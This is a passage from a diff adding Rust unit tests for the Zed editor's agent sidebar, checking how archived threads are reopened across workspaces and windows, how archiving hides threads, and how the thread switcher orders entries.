+        sidebar.activate_archived_thread(
+            ThreadMetadata {
+                session_id: acp::SessionId::new(Arc::from("no-context-session")),
+                agent_id: agent::ZED_AGENT_ID.clone(),
+                title: "Contextless Thread".into(),
+                updated_at: Utc::now(),
+                created_at: None,
+                folder_paths: PathList::default(),
+                main_worktree_paths: PathList::default(),
+                archived: false,
+            },
+            window,
+            cx,
+        );
+    });
+    cx.run_until_parked();
+
+    assert_eq!(
+        multi_workspace.read_with(cx, |mw, _| mw.workspace().clone()),
+        workspace_b,
+        "should have stayed on the active workspace when no path info is available"
+    );
+}
+
+#[gpui::test]
+async fn test_activate_archived_thread_saved_paths_opens_new_workspace(cx: &mut TestAppContext) {
+    // Thread has saved metadata pointing to a path with no open workspace.
+    // Expected: opens a new workspace for that path.
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+    fs.insert_tree("/project-a", serde_json::json!({ "src": {} }))
+        .await;
+    fs.insert_tree("/project-b", serde_json::json!({ "src": {} }))
+        .await;
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await;
+
+    let (multi_workspace, cx) =
+        cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_a, window, cx));
+
+    let sidebar = setup_sidebar(&multi_workspace, cx);
+
+    // Save a thread with path_list pointing to project-b – which has no
+    // open workspace.
+    let path_list_b = PathList::new(&[std::path::PathBuf::from("/project-b")]);
+    let session_id = acp::SessionId::new(Arc::from("archived-new-ws"));
+
+    assert_eq!(
+        multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()),
+        1,
+        "should start with one workspace"
+    );
+
+    sidebar.update_in(cx, |sidebar, window, cx| {
+        sidebar.activate_archived_thread(
+            ThreadMetadata {
+                session_id: session_id.clone(),
+                agent_id: agent::ZED_AGENT_ID.clone(),
+                title: "New WS Thread".into(),
+                updated_at: Utc::now(),
+                created_at: None,
+                folder_paths: path_list_b,
+                main_worktree_paths: PathList::default(),
+                archived: false,
+            },
+            window,
+            cx,
+        );
+    });
+    cx.run_until_parked();
+
+    assert_eq!(
+        multi_workspace.read_with(cx, |mw, _| mw.workspaces().count()),
+        2,
+        "should have opened a second workspace for the archived thread's saved paths"
+    );
+}
+
+#[gpui::test]
+async fn test_activate_archived_thread_reuses_workspace_in_another_window(cx: &mut TestAppContext) {
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+    fs.insert_tree("/project-a", serde_json::json!({ "src": {} }))
+        .await;
+    fs.insert_tree("/project-b", serde_json::json!({ "src": {} }))
+        .await;
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await;
+    let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await;
+
+    let multi_workspace_a =
+        cx.add_window(|window, cx| MultiWorkspace::test_new(project_a, window, cx));
+    let multi_workspace_b =
+        cx.add_window(|window, cx| MultiWorkspace::test_new(project_b, window, cx));
+
+    let multi_workspace_a_entity = multi_workspace_a.root(cx).unwrap();
+    let multi_workspace_b_entity = multi_workspace_b.root(cx).unwrap();
+
+    let cx_b = &mut gpui::VisualTestContext::from_window(multi_workspace_b.into(), cx);
+    let _sidebar_b = setup_sidebar(&multi_workspace_b_entity, cx_b);
+
+    let cx_a = &mut gpui::VisualTestContext::from_window(multi_workspace_a.into(), cx);
+    let sidebar = setup_sidebar(&multi_workspace_a_entity, cx_a);
+
+    let session_id = acp::SessionId::new(Arc::from("archived-cross-window"));
+
+    sidebar.update_in(cx_a, |sidebar, window, cx| {
+        sidebar.activate_archived_thread(
+            ThreadMetadata {
+                session_id: session_id.clone(),
+                agent_id: agent::ZED_AGENT_ID.clone(),
+                title: "Cross Window Thread".into(),
+                updated_at: Utc::now(),
+                created_at: None,
+                folder_paths: PathList::new(&[PathBuf::from("/project-b")]),
+                main_worktree_paths: PathList::default(),
+                archived: false,
+            },
+            window,
+            cx,
+        );
+    });
+    cx_a.run_until_parked();
+
+    assert_eq!(
+        multi_workspace_a
+            .read_with(cx_a, |mw, _| mw.workspaces().count())
+            .unwrap(),
+        1,
+        "should not add the other window's workspace into the current window"
+    );
+    assert_eq!(
+        multi_workspace_b
+            .read_with(cx_a, |mw, _| mw.workspaces().count())
+            .unwrap(),
+        1,
+        "should reuse the existing workspace in the other window"
+    );
+    assert!(
+        cx_a.read(|cx| cx.active_window().unwrap()) == *multi_workspace_b,
+        "should activate the window that already owns the matching workspace"
+    );
+    sidebar.read_with(cx_a, |sidebar, _| {
+        assert!(
+            !matches!(&sidebar.active_entry, Some(ActiveEntry::Thread { session_id: id, .. }) if id == &session_id),
+            "source window's sidebar should not eagerly claim focus for a thread opened in another window"
+        );
+    });
+}
+
+#[gpui::test]
+async fn test_activate_archived_thread_reuses_workspace_in_another_window_with_target_sidebar(
+    cx: &mut TestAppContext,
+) {
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+    fs.insert_tree("/project-a", serde_json::json!({ "src": {} }))
+        .await;
+    fs.insert_tree("/project-b", serde_json::json!({ "src": {} }))
+        .await;
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await;
+    let project_b = project::Project::test(fs.clone(), ["/project-b".as_ref()], cx).await;
+
+    let multi_workspace_a =
+        cx.add_window(|window, cx| MultiWorkspace::test_new(project_a, window, cx));
+    let multi_workspace_b =
+        cx.add_window(|window, cx| MultiWorkspace::test_new(project_b.clone(), window, cx));
+
+    let multi_workspace_a_entity = multi_workspace_a.root(cx).unwrap();
+    let multi_workspace_b_entity = multi_workspace_b.root(cx).unwrap();
+
+    let cx_a = &mut gpui::VisualTestContext::from_window(multi_workspace_a.into(), cx);
+    let sidebar_a = setup_sidebar(&multi_workspace_a_entity, cx_a);
+
+    let cx_b = &mut gpui::VisualTestContext::from_window(multi_workspace_b.into(), cx);
+    let sidebar_b = setup_sidebar(&multi_workspace_b_entity, cx_b);
+    let workspace_b = multi_workspace_b_entity.read_with(cx_b, |mw, _| mw.workspace().clone());
+    let _panel_b = add_agent_panel(&workspace_b, cx_b);
+
+    let session_id = acp::SessionId::new(Arc::from("archived-cross-window-with-sidebar"));
+
+    sidebar_a.update_in(cx_a, |sidebar, window, cx| {
+        sidebar.activate_archived_thread(
+            ThreadMetadata {
+                session_id: session_id.clone(),
+                agent_id: agent::ZED_AGENT_ID.clone(),
+                title: "Cross Window Thread".into(),
+                updated_at: Utc::now(),
+                created_at: None,
+                folder_paths: PathList::new(&[PathBuf::from("/project-b")]),
+                main_worktree_paths: PathList::default(),
+                archived: false,
+            },
+            window,
+            cx,
+        );
+    });
+    cx_a.run_until_parked();
+
+    assert_eq!(
+        multi_workspace_a
+            .read_with(cx_a, |mw, _| mw.workspaces().count())
+            .unwrap(),
+        1,
+        "should not add the other window's workspace into the current window"
+    );
+    assert_eq!(
+        multi_workspace_b
+            .read_with(cx_a, |mw, _| mw.workspaces().count())
+            .unwrap(),
+        1,
+        "should reuse the existing workspace in the other window"
+    );
+    assert!(
+        cx_a.read(|cx| cx.active_window().unwrap()) == *multi_workspace_b,
+        "should activate the window that already owns the matching workspace"
+    );
+    sidebar_a.read_with(cx_a, |sidebar, _| {
+        assert!(
+            !matches!(&sidebar.active_entry, Some(ActiveEntry::Thread { session_id: id, .. }) if id == &session_id),
+            "source window's sidebar should not eagerly claim focus for a thread opened in another window"
+        );
+    });
+    sidebar_b.read_with(cx_b, |sidebar, _| {
+        assert_active_thread(
+            sidebar,
+            &session_id,
+            "target window's sidebar should eagerly focus the activated archived thread",
+        );
+    });
+}
+
+#[gpui::test]
+async fn test_activate_archived_thread_prefers_current_window_for_matching_paths(
+    cx: &mut TestAppContext,
+) {
+    init_test(cx);
+    let fs = FakeFs::new(cx.executor());
+    fs.insert_tree("/project-a", serde_json::json!({ "src": {} }))
+        .await;
+    cx.update(|cx| <dyn Fs>::set_global(fs.clone(), cx));
+
+    let project_b = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await;
+    let project_a = project::Project::test(fs.clone(), ["/project-a".as_ref()], cx).await;
+
+    let multi_workspace_b =
+        cx.add_window(|window, cx| MultiWorkspace::test_new(project_b, window, cx));
+    let multi_workspace_a =
+        cx.add_window(|window, cx| MultiWorkspace::test_new(project_a, window, cx));
+
+    let multi_workspace_a_entity = multi_workspace_a.root(cx).unwrap();
+    let multi_workspace_b_entity = multi_workspace_b.root(cx).unwrap();
+
+    let cx_b = &mut gpui::VisualTestContext::from_window(multi_workspace_b.into(), cx);
+    let _sidebar_b = setup_sidebar(&multi_workspace_b_entity, cx_b);
+
+    let cx_a = &mut gpui::VisualTestContext::from_window(multi_workspace_a.into(), cx);
+    let sidebar_a = setup_sidebar(&multi_workspace_a_entity, cx_a);
+
+    let session_id = acp::SessionId::new(Arc::from("archived-current-window"));
+
+    sidebar_a.update_in(cx_a, |sidebar, window, cx| {
+        sidebar.activate_archived_thread(
+            ThreadMetadata {
+                session_id: session_id.clone(),
+                agent_id: agent::ZED_AGENT_ID.clone(),
+                title: "Current Window Thread".into(),
+                updated_at: Utc::now(),
+                created_at: None,
+                folder_paths: PathList::new(&[PathBuf::from("/project-a")]),
+                main_worktree_paths: PathList::default(),
+                archived: false,
+            },
+            window,
+            cx,
+        );
+    });
+    cx_a.run_until_parked();
+
+    assert!(
+        cx_a.read(|cx| cx.active_window().unwrap()) == *multi_workspace_a,
+        "should keep activation in the current window when it already has a matching workspace"
+    );
+    sidebar_a.read_with(cx_a, |sidebar, _| {
+        assert_active_thread(
+            sidebar,
+            &session_id,
+            "current window's sidebar should eagerly focus the activated archived thread",
+        );
+    });
+    assert_eq!(
+        multi_workspace_a
+            .read_with(cx_a, |mw, _| mw.workspaces().count())
+            .unwrap(),
+        1,
+        "current window should continue reusing its existing workspace"
+    );
+    assert_eq!(
+        multi_workspace_b
+            .read_with(cx_a, |mw, _| mw.workspaces().count())
+            .unwrap(),
+        1,
+        "other windows should not be activated just because they also match the saved paths"
+    );
+}
+
+#[gpui::test]
+async fn test_archive_thread_uses_next_threads_own_workspace(cx: &mut TestAppContext) {
+    // Regression test: archive_thread previously always loaded the next thread
+    // through group_workspace (the main workspace's ProjectHeader), even when
+    // the next thread belonged to an absorbed linked-worktree workspace. That
+    // caused the worktree thread to be loaded in the main panel, which bound it
+    // to the main project and corrupted its stored folder_paths.
+ // + // The fix: use next.workspace (ThreadEntryWorkspace::Open) when available, + // falling back to group_workspace only for Closed workspaces. + agent_ui::test_support::init_test(cx); + cx.update(|cx| { + cx.update_flags(false, vec!["agent-v2".into()]); + ThreadStore::init_global(cx); + ThreadMetadataStore::init_global(cx); + language_model::LanguageModelRegistry::test(cx); + prompt_store::init(cx); + }); + + let fs = FakeFs::new(cx.executor()); + + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + let main_project = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + + main_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(main_project.clone(), window, cx)); + + let sidebar = setup_sidebar(&multi_workspace, cx); + + let worktree_workspace = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(worktree_project.clone(), window, cx) + }); + + // Activate main workspace so the sidebar tracks the main panel. 
+ multi_workspace.update_in(cx, |mw, window, cx| { + let workspace = mw.workspaces().next().unwrap().clone(); + mw.activate(workspace, window, cx); + }); + + let main_workspace = + multi_workspace.read_with(cx, |mw, _| mw.workspaces().next().unwrap().clone()); + let main_panel = add_agent_panel(&main_workspace, cx); + let _worktree_panel = add_agent_panel(&worktree_workspace, cx); + + // Open Thread 2 in the main panel and keep it running. + let connection = StubAgentConnection::new(); + open_thread_with_connection(&main_panel, connection.clone(), cx); + send_message(&main_panel, cx); + + let thread2_session_id = active_session_id(&main_panel, cx); + + cx.update(|_, cx| { + connection.send_update( + thread2_session_id.clone(), + acp::SessionUpdate::AgentMessageChunk(acp::ContentChunk::new("working...".into())), + cx, + ); + }); + + // Save thread 2's metadata with a newer timestamp so it sorts above thread 1. + save_thread_metadata( + thread2_session_id.clone(), + "Thread 2".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + None, + &main_project, + cx, + ); + + // Save thread 1's metadata with the worktree path and an older timestamp so + // it sorts below thread 2. archive_thread will find it as the "next" candidate. + let thread1_session_id = acp::SessionId::new(Arc::from("thread1-worktree-session")); + save_thread_metadata( + thread1_session_id, + "Thread 1".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &worktree_project, + cx, + ); + + cx.run_until_parked(); + + // Verify the sidebar absorbed thread 1 under [project] with the worktree chip. + let entries_before = visible_entries_as_strings(&sidebar, cx); + assert!( + entries_before.iter().any(|s| s.contains("{wt-feature-a}")), + "Thread 1 should appear with the linked-worktree chip before archiving: {:?}", + entries_before + ); + + // The sidebar should track T2 as the focused thread (derived from the + // main panel's active view). 
+ sidebar.read_with(cx, |s, _| { + assert_active_thread( + s, + &thread2_session_id, + "focused thread should be Thread 2 before archiving", + ); + }); + + // Archive thread 2. + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.archive_thread(&thread2_session_id, window, cx); + }); + + cx.run_until_parked(); + + // The main panel's active thread must still be thread 2. + let main_active = main_panel.read_with(cx, |panel, cx| { + panel + .active_agent_thread(cx) + .map(|t| t.read(cx).session_id().clone()) + }); + assert_eq!( + main_active, + Some(thread2_session_id.clone()), + "main panel should not have been taken over by loading the linked-worktree thread T1; \ + before the fix, archive_thread used group_workspace instead of next.workspace, \ + causing T1 to be loaded in the wrong panel" + ); + + // Thread 1 should still appear in the sidebar with its worktree chip + // (Thread 2 was archived so it is gone from the list). + let entries_after = visible_entries_as_strings(&sidebar, cx); + assert!( + entries_after.iter().any(|s| s.contains("{wt-feature-a}")), + "T1 should still carry its linked-worktree chip after archiving T2: {:?}", + entries_after + ); +} + +#[gpui::test] +async fn test_linked_worktree_threads_not_duplicated_across_groups(cx: &mut TestAppContext) { + // When a multi-root workspace (e.g. [/other, /project]) shares a + // repo with a single-root workspace (e.g. [/project]), linked + // worktree threads from the shared repo should only appear under + // the dedicated group [project], not under [other, project]. + init_test(cx); + let fs = FakeFs::new(cx.executor()); + + // Two independent repos, each with their own git history. + fs.insert_tree( + "/project", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + fs.insert_tree( + "/other", + serde_json::json!({ + ".git": {}, + "src": {}, + }), + ) + .await; + + // Register the linked worktree in the main repo. 
+ fs.add_linked_worktree_for_repo( + Path::new("/project/.git"), + false, + git::repository::Worktree { + path: std::path::PathBuf::from("/wt-feature-a"), + ref_name: Some("refs/heads/feature-a".into()), + sha: "aaa".into(), + is_main: false, + }, + ) + .await; + + cx.update(|cx| ::set_global(fs.clone(), cx)); + + // Workspace 1: just /project. + let project_only = project::Project::test(fs.clone(), ["/project".as_ref()], cx).await; + project_only + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + // Workspace 2: /other and /project together (multi-root). + let multi_root = + project::Project::test(fs.clone(), ["/other".as_ref(), "/project".as_ref()], cx).await; + multi_root + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let worktree_project = project::Project::test(fs.clone(), ["/wt-feature-a".as_ref()], cx).await; + worktree_project + .update(cx, |p, cx| p.git_scans_complete(cx)) + .await; + + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project_only.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(multi_root.clone(), window, cx); + }); + + // Save a thread under the linked worktree path. + save_named_thread_metadata("wt-thread", "Worktree Thread", &worktree_project, cx).await; + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + // The thread should appear only under [project] (the dedicated + // group for the /project repo), not under [other, project]. 
+ assert_eq!( + visible_entries_as_strings(&sidebar, cx), + vec![ + "v [other, project]", + " [+ New Thread]", + "v [project]", + " Worktree Thread {wt-feature-a}", + ] + ); +} + +#[gpui::test] +async fn test_thread_switcher_ordering(cx: &mut TestAppContext) { + let project = init_test_project_with_agent_panel("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let (sidebar, panel) = setup_sidebar_with_agent_panel(&multi_workspace, cx); + + let switcher_ids = + |sidebar: &Entity, cx: &mut gpui::VisualTestContext| -> Vec { + sidebar.read_with(cx, |sidebar, cx| { + let switcher = sidebar + .thread_switcher + .as_ref() + .expect("switcher should be open"); + switcher + .read(cx) + .entries() + .iter() + .map(|e| e.session_id.clone()) + .collect() + }) + }; + + let switcher_selected_id = + |sidebar: &Entity, cx: &mut gpui::VisualTestContext| -> acp::SessionId { + sidebar.read_with(cx, |sidebar, cx| { + let switcher = sidebar + .thread_switcher + .as_ref() + .expect("switcher should be open"); + let s = switcher.read(cx); + s.selected_entry() + .expect("should have selection") + .session_id + .clone() + }) + }; + + // ── Setup: create three threads with distinct created_at times ────── + // Thread C (oldest), Thread B, Thread A (newest) — by created_at. + // We send messages in each so they also get last_message_sent_or_queued timestamps. 
+ let connection_c = StubAgentConnection::new(); + connection_c.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done C".into()), + )]); + open_thread_with_connection(&panel, connection_c, cx); + send_message(&panel, cx); + let session_id_c = active_session_id(&panel, cx); + save_thread_metadata( + session_id_c.clone(), + "Thread C".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap()), + &project, + cx, + ); + + let connection_b = StubAgentConnection::new(); + connection_b.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done B".into()), + )]); + open_thread_with_connection(&panel, connection_b, cx); + send_message(&panel, cx); + let session_id_b = active_session_id(&panel, cx); + save_thread_metadata( + session_id_b.clone(), + "Thread B".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap()), + &project, + cx, + ); + + let connection_a = StubAgentConnection::new(); + connection_a.set_next_prompt_updates(vec![acp::SessionUpdate::AgentMessageChunk( + acp::ContentChunk::new("Done A".into()), + )]); + open_thread_with_connection(&panel, connection_a, cx); + send_message(&panel, cx); + let session_id_a = active_session_id(&panel, cx); + save_thread_metadata( + session_id_a.clone(), + "Thread A".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 3, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 3, 0, 0, 0).unwrap()), + &project, + cx, + ); + + // All three threads are now live. Thread A was opened last, so it's + // the one being viewed. Opening each thread called record_thread_access, + // so all three have last_accessed_at set. + // Access order is: A (most recent), B, C (oldest). + + // ── 1. 
Open switcher: threads sorted by last_accessed_at ───────────────── + focus_sidebar(&sidebar, cx); + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + // All three have last_accessed_at, so they sort by access time. + // A was accessed most recently (it's the currently viewed thread), + // then B, then C. + assert_eq!( + switcher_ids(&sidebar, cx), + vec![ + session_id_a.clone(), + session_id_b.clone(), + session_id_c.clone() + ], + ); + // First ctrl-tab selects the second entry (B). + assert_eq!(switcher_selected_id(&sidebar, cx), session_id_b); + + // Dismiss the switcher without confirming. + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar.dismiss_thread_switcher(cx); + }); + cx.run_until_parked(); + + // ── 2. Confirm on Thread C: it becomes most-recently-accessed ────── + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + // Cycle twice to land on Thread C (index 2). + sidebar.read_with(cx, |sidebar, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + assert_eq!(switcher.read(cx).selected_index(), 1); + }); + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar + .thread_switcher + .as_ref() + .unwrap() + .update(cx, |s, cx| s.cycle_selection(cx)); + }); + cx.run_until_parked(); + assert_eq!(switcher_selected_id(&sidebar, cx), session_id_c); + + assert!(sidebar.update(cx, |sidebar, _cx| sidebar.thread_last_accessed.is_empty())); + + // Confirm on Thread C. + sidebar.update_in(cx, |sidebar, window, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + let focus = switcher.focus_handle(cx); + focus.dispatch_action(&menu::Confirm, window, cx); + }); + cx.run_until_parked(); + + // Switcher should be dismissed after confirm. 
+ sidebar.read_with(cx, |sidebar, _cx| { + assert!( + sidebar.thread_switcher.is_none(), + "switcher should be dismissed" + ); + }); + + sidebar.update(cx, |sidebar, _cx| { + let last_accessed = sidebar + .thread_last_accessed + .keys() + .cloned() + .collect::>(); + assert_eq!(last_accessed.len(), 1); + assert!(last_accessed.contains(&session_id_c)); + assert!( + sidebar + .active_entry + .as_ref() + .expect("active_entry should be set") + .is_active_thread(&session_id_c) + ); + }); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + switcher_ids(&sidebar, cx), + vec![ + session_id_c.clone(), + session_id_a.clone(), + session_id_b.clone() + ], + ); + + // Confirm on Thread A. + sidebar.update_in(cx, |sidebar, window, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + let focus = switcher.focus_handle(cx); + focus.dispatch_action(&menu::Confirm, window, cx); + }); + cx.run_until_parked(); + + sidebar.update(cx, |sidebar, _cx| { + let last_accessed = sidebar + .thread_last_accessed + .keys() + .cloned() + .collect::>(); + assert_eq!(last_accessed.len(), 2); + assert!(last_accessed.contains(&session_id_c)); + assert!(last_accessed.contains(&session_id_a)); + assert!( + sidebar + .active_entry + .as_ref() + .expect("active_entry should be set") + .is_active_thread(&session_id_a) + ); + }); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + assert_eq!( + switcher_ids(&sidebar, cx), + vec![ + session_id_a.clone(), + session_id_c.clone(), + session_id_b.clone(), + ], + ); + + sidebar.update_in(cx, |sidebar, _window, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + switcher.update(cx, |switcher, cx| switcher.cycle_selection(cx)); + }); + cx.run_until_parked(); + + // Confirm on Thread B. 
+ sidebar.update_in(cx, |sidebar, window, cx| { + let switcher = sidebar.thread_switcher.as_ref().unwrap(); + let focus = switcher.focus_handle(cx); + focus.dispatch_action(&menu::Confirm, window, cx); + }); + cx.run_until_parked(); + + sidebar.update(cx, |sidebar, _cx| { + let last_accessed = sidebar + .thread_last_accessed + .keys() + .cloned() + .collect::>(); + assert_eq!(last_accessed.len(), 3); + assert!(last_accessed.contains(&session_id_c)); + assert!(last_accessed.contains(&session_id_a)); + assert!(last_accessed.contains(&session_id_b)); + assert!( + sidebar + .active_entry + .as_ref() + .expect("active_entry should be set") + .is_active_thread(&session_id_b) + ); + }); + + // ── 3. Add a historical thread (no last_accessed_at, no message sent) ── + // This thread was never opened in a panel — it only exists in metadata. + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-historical")), + "Historical Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 6, 1, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 6, 1, 0, 0, 0).unwrap()), + &project, + cx, + ); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + // Historical Thread has no last_accessed_at and no last_message_sent_or_queued, + // so it falls to tier 3 (sorted by created_at). It should appear after all + // accessed threads, even though its created_at (June 2024) is much later + // than the others. + // + // But the live threads (A, B, C) each had send_message called which sets + // last_message_sent_or_queued. So for the accessed threads (tier 1) the + // sort key is last_accessed_at; for Historical Thread (tier 3) it's created_at. 
+ let session_id_hist = acp::SessionId::new(Arc::from("thread-historical")); + + let ids = switcher_ids(&sidebar, cx); + assert_eq!( + ids, + vec![ + session_id_b.clone(), + session_id_a.clone(), + session_id_c.clone(), + session_id_hist.clone() + ], + ); + + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar.dismiss_thread_switcher(cx); + }); + cx.run_until_parked(); + + // ── 4. Add another historical thread with older created_at ───────── + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-old-historical")), + "Old Historical Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2023, 6, 1, 0, 0, 0).unwrap(), + Some(chrono::TimeZone::with_ymd_and_hms(&Utc, 2023, 6, 1, 0, 0, 0).unwrap()), + &project, + cx, + ); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.on_toggle_thread_switcher(&ToggleThreadSwitcher::default(), window, cx); + }); + cx.run_until_parked(); + + // Both historical threads have no access or message times. They should + // appear after accessed threads, sorted by created_at (newest first). 
+ let session_id_old_hist = acp::SessionId::new(Arc::from("thread-old-historical")); + let ids = switcher_ids(&sidebar, cx); + assert_eq!( + ids, + vec![ + session_id_b, + session_id_a, + session_id_c, + session_id_hist, + session_id_old_hist, + ], + ); + + sidebar.update_in(cx, |sidebar, _window, cx| { + sidebar.dismiss_thread_switcher(cx); + }); + cx.run_until_parked(); +} + +#[gpui::test] +async fn test_archive_thread_keeps_metadata_but_hides_from_sidebar(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("thread-to-archive")), + "Thread To Archive".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("Thread To Archive")), + "expected thread to be visible before archiving, got: {entries:?}" + ); + + sidebar.update_in(cx, |sidebar, window, cx| { + sidebar.archive_thread( + &acp::SessionId::new(Arc::from("thread-to-archive")), + window, + cx, + ); + }); + cx.run_until_parked(); + + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + !entries.iter().any(|e| e.contains("Thread To Archive")), + "expected thread to be hidden after archiving, got: {entries:?}" + ); + + cx.update(|_, cx| { + let store = ThreadMetadataStore::global(cx); + let archived: Vec<_> = store.read(cx).archived_entries().collect(); + assert_eq!(archived.len(), 1); + assert_eq!(archived[0].session_id.0.as_ref(), "thread-to-archive"); + assert!(archived[0].archived); + }); +} + +#[gpui::test] +async fn 
test_archived_threads_excluded_from_sidebar_entries(cx: &mut TestAppContext) { + let project = init_test_project("/my-project", cx).await; + let (multi_workspace, cx) = + cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let sidebar = setup_sidebar(&multi_workspace, cx); + + save_thread_metadata( + acp::SessionId::new(Arc::from("visible-thread")), + "Visible Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 2, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + let archived_thread_session_id = acp::SessionId::new(Arc::from("archived-thread")); + save_thread_metadata( + archived_thread_session_id.clone(), + "Archived Thread".into(), + chrono::TimeZone::with_ymd_and_hms(&Utc, 2024, 1, 1, 0, 0, 0).unwrap(), + None, + &project, + cx, + ); + + cx.update(|_, cx| { + ThreadMetadataStore::global(cx).update(cx, |store, cx| { + store.archive(&archived_thread_session_id, cx) + }) + }); + cx.run_until_parked(); + + multi_workspace.update_in(cx, |_, _window, cx| cx.notify()); + cx.run_until_parked(); + + let entries = visible_entries_as_strings(&sidebar, cx); + assert!( + entries.iter().any(|e| e.contains("Visible Thread")), + "expected visible thread in sidebar, got: {entries:?}" + ); + assert!( + !entries.iter().any(|e| e.contains("Archived Thread")), + "expected archived thread to be hidden from sidebar, got: {entries:?}" + ); + + cx.update(|_, cx| { + let store = ThreadMetadataStore::global(cx); + let all: Vec<_> = store.read(cx).entries().collect(); + assert_eq!( + all.len(), + 2, + "expected 2 total entries in the store, got: {}", + all.len() + ); + + let archived: Vec<_> = store.read(cx).archived_entries().collect(); + assert_eq!(archived.len(), 1); + assert_eq!(archived[0].session_id.0.as_ref(), "archived-thread"); + }); +} + +#[gpui::test] +async fn test_linked_worktree_workspace_shows_main_worktree_threads(cx: &mut TestAppContext) { + // When only a linked worktree workspace is open 